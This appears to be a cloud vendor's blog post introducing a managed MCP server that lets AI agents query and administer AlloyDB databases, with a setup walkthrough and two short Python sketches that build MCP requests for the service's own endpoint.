Fully-managed HTTP endpoints: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.
Fine-grained authorization: Instead of using shared database passwords or API keys, you use Identity and Access Management (IAM) to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from making accidental changes to or deletions from your database.
Operational instance management: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.
Model Armor protection: Model Armor provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.
Audit logging: Every query, action, and tool call goes to Cloud Audit Logs, giving security teams a full audit trail.

Let's see it in action: A quick demo

Getting started with the AlloyDB Remote MCP server is a straightforward process. To see it in action in your own environment, you can follow our new Codelab, which guides you through these essential steps:

API & environment prep: Enable the AlloyDB, Compute Engine, and Gemini Enterprise APIs in your Google Cloud project.
Provision your database: Deploy your AlloyDB cluster, create your database, and import your sample data.
Enable data access API: Enable the Data Access API on your AlloyDB instance.
Connect the agent: Configure your MCP client by providing the remote endpoint (https://alloydb.googleapis.com/mcp). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.
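Here is a minimal sketch of the connection step using only the Python standard library. It builds, but does not send, an MCP JSON-RPC 2.0 request for the endpoint named above, with the OAuth 2.0 access token in the Authorization header. It assumes you already have a token, for example from `gcloud auth print-access-token`. A complete client would first perform MCP's `initialize` handshake and echo back any `Mcp-Session-Id` header the server returns. In practice, an MCP client library or your agent framework usually handles this for you.

```python
import itertools
import json
import urllib.request

ALLOYDB_MCP_ENDPOINT = "https://alloydb.googleapis.com/mcp"
_request_ids = itertools.count(1)  # JSON-RPC request IDs must be unique per session


def mcp_request(method: str, params: dict, access_token: str,
                endpoint: str = ALLOYDB_MCP_ENDPOINT) -> urllib.request.Request:
    """Build (without sending) an MCP JSON-RPC 2.0 request as an HTTP POST."""
    body = {"jsonrpc": "2.0", "id": next(_request_ids), "method": method, "params": params}
    return urllib.request.Request(
        endpoint,
        data=json.dumps(body).encode("utf-8"),
        method="POST",
        headers={
            # Google Cloud IAM credentials passed as an OAuth 2.0 bearer token.
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/json",
            # MCP's Streamable HTTP transport lets servers answer with JSON or SSE.
            "Accept": "application/json, text/event-stream",
        },
    )
```

After the handshake, sending `mcp_request("tools/list", {}, token)` with `urllib.request.urlopen` would return the tools the server exposes.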

Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.
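Introspection is ordinary SQL against the standard PostgreSQL catalog. The Python sketch below serializes an MCP `tools/call` request that asks an SQL tool to list every user table and column. The tool name `execute_sql` and its `sql` argument are hypothetical placeholders. The real AlloyDB tool names and input schemas, which likely also identify the cluster, instance, and database, are reported by the server's `tools/list` response.

```python
import json

# Standard PostgreSQL catalog query listing user tables and their columns.
INTROSPECTION_SQL = """
SELECT table_schema, table_name, column_name, data_type
FROM information_schema.columns
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
ORDER BY table_schema, table_name, ordinal_position;
""".strip()


def tool_call_payload(tool_name: str, arguments: dict, request_id: int = 1) -> str:
    """Serialize an MCP JSON-RPC 2.0 `tools/call` request body."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool_name, "arguments": arguments},
    })


# Hypothetical tool and argument names: read the real ones from `tools/list`.
payload = tool_call_payload("execute_sql", {"sql": INTROSPECTION_SQL})
```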

Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB AI functions like AI.RANK().

Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database.

What's next

By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth.

Ready to build? Discover AlloyDB with a 30-day free trial, and dive into the Remote MCP for AlloyDB Codelab to start powering your enterprise agentic applications today.